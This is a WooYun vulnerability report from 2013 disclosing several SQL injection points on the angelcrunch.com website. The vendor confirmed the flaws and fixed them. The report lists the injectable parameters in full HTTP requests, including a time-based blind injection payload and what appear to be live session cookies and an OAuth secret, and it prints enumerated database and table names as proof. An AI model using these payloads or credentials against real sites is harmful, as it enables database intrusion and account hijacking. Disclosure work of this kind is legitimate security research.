当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046924

漏洞标题:天使汇主站多处SQL注入漏洞

相关厂商:angelcrunch.com

漏洞作者: 小胖子

提交时间:2013-12-24 17:16

修复时间:2014-02-07 17:17

公开时间:2014-02-07 17:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-24: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经确认,细节仅向厂商公开
2014-01-03: 细节向核心白帽子及相关领域专家公开
2014-01-13: 细节向普通白帽子公开
2014-01-23: 细节向实习白帽子公开
2014-02-07: 细节向公众公开

简要描述:

刷点WB参加众测啊~

详细说明:

注入地址有很多处,注册用户登录后带cookies注入。
注入点1

POST /home/search HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keyword=1


keyword存在注入
注入点2 GET注入

GET /startup/?industryid=1 HTTP/1.1
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


get参数industryid存在注入
注入点3

GET /user/investor?p=0&regionid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


反正只要是存在search的,基本都有注入。

漏洞证明:

当前数据库:
current database: 'angelcrunch'
数据库:
available databases [3]:
[*] angelcrunch
[*] information_schema
[*] test
当前数据的表。

Database: angelcrunch
[75 tables]
+-------------------------+
| mc_emptoken             |
| mc_usertoken            |
| sq_dynamic              |
| sq_user                 |
| startup                 |
| tb_blog                 |
| tb_blog_reply           |
| tb_cafe                 |
| tb_cooperation_kibey    |
| tb_crowdfunding         |
| tb_demoday              |
| tb_demoday_firm         |
| tb_demoday_investor     |
| tb_demoday_signup       |
| tb_demoday_startup      |
| tb_demoday_subscription |
| tb_dict                 |
| tb_disabledemail        |
| tb_dynamic              |
| tb_dynamic_temp         |
| tb_edu_experience       |
| tb_emp                  |
| tb_emp_role             |
| tb_feedback             |
| tb_feedback_email       |
| tb_financing            |
| tb_firm                 |
| tb_industry             |
| tb_investor             |
| tb_investor_industry    |
| tb_investor_prefer      |
| tb_investor_remark      |
| tb_investor_service     |
| tb_invite               |
| tb_leadinvestor_apply   |
| tb_mail                 |
| tb_mediareport          |
| tb_msg                  |
| tb_notice               |
| tb_privilege            |
| tb_region               |
| tb_resource             |
| tb_role                 |
| tb_role_privilege       |
| tb_school               |
| tb_sns_bind             |
| tb_startup              |
| tb_startup_answer       |
| tb_startup_application  |
| tb_startup_comment      |
| tb_startup_delivery     |
| tb_startup_follow       |
| tb_startup_industry     |
| tb_startup_meeting      |
| tb_startup_milestone    |
| tb_startup_part         |
| tb_startup_remark       |
| tb_startup_setting      |
| tb_startup_sharing      |
| tb_startup_updateinfo   |
| tb_startup_viewer       |
| tb_startup_warmup       |
| tb_startup_whitelist    |
| tb_startupquestion      |
| tb_sysvar               |
| tb_test                 |
| tb_user                 |
| tb_user_dynamic         |
| tb_user_email           |
| tb_user_follow          |
| tb_user_loginlog        |
| tb_user_updateinfo      |
| tb_wechat_bind          |
| tb_wechat_show          |
| tb_work_experience      |
+-------------------------+

修复方案:

0x1:全站全面自查,发现基本没有过滤。
0x2:求20rank!

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-12-24 17:25

厂商回复:

问题正在修复中...

最新状态:

2013-12-25:问题已修复

漏洞评价:

评论

  1. 2013-12-24 17:18 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @爱上平顶山 你来发掘厂商,我来拿shell,你看如何?

  2. 2013-12-24 17:18 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @小胖子 你妹 啊

  3. 2013-12-24 17:20 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    你关注的白帽子 小胖子 发表了漏洞 天使汇主站多处SQL注入漏洞

  4. 2013-12-24 17:25 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @zzR 他紧跟我啊 哈、 我发2 他赶紧来一个

  5. 2013-12-24 17:26 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @爱上平顶山 看小胖签名就什么都懂了~